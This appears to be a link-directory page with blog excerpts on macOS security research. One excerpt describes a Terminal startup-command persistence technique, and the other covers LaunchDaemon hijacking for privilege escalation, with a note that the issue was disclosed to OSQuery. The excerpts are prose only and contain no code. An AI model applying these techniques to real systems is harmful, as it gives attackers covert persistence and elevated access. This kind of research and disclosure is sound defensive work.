Explore >> Select a destination
|
You are here 
|
macops.ca | ||
| | | | |
theevilbit.github.io
|
|
| | | | | This is part 20 in the series of "Beyond the good ol' LaunchAgents", where I try to collect various persistence techniques for macOS. For more background check the introduction. This is another application specific persistence method, related to the Terminal application. In the Terminal Preferences, under the Profiles tab, we can set a command that will be executed upon Terminal's startup. This is shown in the screen below. | |
| | | | |
sunainapai.com
|
|
| | | | | ||
| | | | |
www.mac4n6.com
|
|
| | | | | ||
| | | | |
bradleyjkemp.dev
|
|
| | | LaunchDaemon (or LaunchAgent) Hijacking is a MacOS privilege escalation and persistence technique. It involves abusing insecure file/folder permissions to replace legitimately installed, misconfigured LaunchDaemons with malicious code. I first spotted this issue affecting the OSQuery installer but went looking and found multiple other products with the same problem. This isn't a novel technique (it's briefly mentioned in T1543.004) but I was surprised to find it so rarely talked about. Example - Hijacking the OSQuery LaunchDaemon ?? I've already disclosed this issue to the OSQuery team and they kindly let me use it as an example in this post. | ||
